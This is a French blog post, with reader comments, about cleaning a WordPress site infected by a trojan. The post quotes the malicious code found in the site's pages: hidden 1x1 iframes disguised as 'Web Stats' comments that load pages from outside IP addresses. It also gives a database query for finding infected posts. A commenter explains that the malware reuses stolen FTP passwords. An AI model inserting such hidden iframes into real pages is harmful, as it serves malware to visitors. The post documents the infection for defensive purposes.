03 mai 2009

Cheval de troie JS:Packed-T [trj] et malware ‘HTML/Iframe-inf’

Par libretto
Cheval de Troie

Cheval de Troie

J’ai un site qui a été infecté par ce couple d’emmerdement juste avant le WE du premier Mai.

Le symptôme :

Les anti-virus de vos visiteurs vont se mettre à clignoter avec des messages citant ces 2 coupables :

  • Cheval de troie JS:Packed-T [trj]
  • Programme malveillant  ‘HTML/Iframe-inf’

Il me semble que ces 2 problèmes ont une seule solution.

J’ai trouvé ceci dans le code source de la page infestée :

<!-- Web Stats -->
<iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe>
<!-- End Web Stats -->

D’après Field Marshall il s’agit simplement d’une ligne de texte qui s’est introduite à la fin des fichiers index.php. Field Marshall indique des méthodes basées sur des scripts à lancer sur une console pour chasser et éradiquer le problème.

De mon coté, cela me rappelle quelque chose et j’ai déjà été victime d’un troyen. C’était wp-stat et ça ressemble beaucoup à JS:Packed. Je vous recommande la lecture de cet article d’ailleurs.

J’ai commencé par éradiquer la chaine contenant le terme « iframe » avec une recherche dans les sources des derniers articles publiés.

Pour vérifier dans la base de données, on peut se loguer avec PhpMyAdmin et lancer la requête suivante :

SELECT * FROM wp_posts WHERE post_content like '%IFRAME%' ;

Attention, maintenant que WordPress archive les articles, vous pouvez encore trouver des trace de la ligne dans des version archivées des articles nettoyés (post-type = revision).

Parmis les articles incriminées j’ai trouvé ce code :

<!-- Traffic Statistics --> <iframe src="http://61.132.75.71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->

Et aussi celui là :

<!-- Web Stats --> <iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!-- End Web Stats -->

Pour ce soir, je vais en rester là. J’imagine que ce sont des postes de rédacteurs qui sont infestés et qui ont permis l’intrusion de ces codes.


Tags : , ,
Categories: Actualités
tags: , ,
Trackbacks Commentaires
  • Youssef dit :
    19 mai 2009 à 19:46

    salut; jai le meme probleme avec mes deux site d wordpress l premier est http://www.seriestream.net et me deuxieme c filmsgratos.com je n sais pas dou il vient c virus d cheval d 3 mais jai rien hebergé sur mon host depuisleurs instalation etle 2eme site filmsgratos je lesmeme pas touché presque une semaine , la coincidence c le meme jour les deux sites va etre victime d c Virus HTML/Iframe-inf’ merci d maidez

    Répondre
  • aalex57 dit :
    8 juin 2009 à 14:43

    J’ai le problème avec l’ensemble de mon site, je n’arrive pas à le fr partir :(
    Help

    Répondre
  • Eric clapton dit :
    18 septembre 2009 à 7:00

    il faut pas télécharger des Widget de n’importe ou

    Répondre
  • metin2 powerleveling dit :
    12 octobre 2009 à 2:18

    J’ai le problème avec l’ensemble de mon site, je n’arrive pas à le fr partir
    Help

    Répondre
  • aelOnn dit :
    12 octobre 2009 à 17:04

    Bonjour,

    j’ai eu le même problème, et j’avais beau nettoyer, l’infestation revenait.
    En fait c’est tout simple: c’est votre PC à vous qui est infecté ! Le troyen utilise les mots de passe FTP enregistrés sur votre PC pour éditer directement les fichiers.

    Le remede: changer tous vos pass FTP, passer votre PC au scan d’un antivrus sérieux, dans le doute éviter de sauvegarder vos nouveaux mots de passe dans FileZilla, et enfin nettoyer toutes vos pages infectées (une petite recherche sur le mot clef « iframe » sur tous les fichiers de votre site, avec Texpad par exemple)

    Bon courage.

    Répondre
  • Livre photo dit :
    4 novembre 2009 à 13:27

    j’avais eu le même problème aussi et c’était mon PC qui est infecté mais jusqu’à maintenant j’ai pas encore trouvée la solution…

    Répondre
Réagissez